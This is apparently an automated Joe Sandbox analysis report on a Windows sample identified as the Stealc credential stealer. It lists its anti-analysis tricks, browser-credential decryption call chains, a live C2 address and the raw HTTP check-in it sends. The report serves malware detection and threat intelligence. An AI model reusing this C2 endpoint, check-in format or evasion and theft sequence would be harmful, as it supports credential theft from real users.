Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561922
MD5:969e7116d6269d76ae0df0b8126872e9
SHA1:30b1390b554c8d1e0b0a9af308488276cd13beb9
SHA256:d2a488577867cfd25a06cca8c590e7054429f50bfeecb35d641aac911a8ccdb0
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 969E7116D6269D76AE0DF0B8126872E9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7604JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7604JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T20:01:19.759532+010020442431Malware Command and Control Activity Detected192.168.2.749706185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/&~Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 39%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_006A4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_006A60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_006C40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,3_2_006B6960
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006AEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,3_2_006AEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,3_2_006B6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_006A9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A9B80 CryptUnprotectData,LocalAlloc,LocalFree,3_2_006A9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,3_2_006A7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,3_2_006B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_006BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006A16B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49706 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 33 41 32 30 32 42 34 44 38 38 31 35 33 35 34 31 38 33 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"133A202B4D881535418320------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"mars------AAFIJKKEHJDHJKFIECAA--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,3_2_006A6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 33 41 32 30 32 42 34 44 38 38 31 35 33 35 34 31 38 33 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"133A202B4D881535418320------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"mars------AAFIJKKEHJDHJKFIECAA--
              Source: file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/&~
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,3_2_006A9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B43_2_00A358B4
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C48B03_2_006C48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A009A33_2_00A009A3
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A901EB3_2_00A901EB
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A631F63_2_00A631F6
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A6515F3_2_00A6515F
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A592853_2_00A59285
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009BFADD3_2_009BFADD
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A5421F3_2_00A5421F
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A1CBE93_2_00A1CBE9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A5E31F3_2_00A5E31F
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A5D37B3_2_00A5D37B
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A5FC953_2_00A5FC95
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A55D8E3_2_00A55D8E
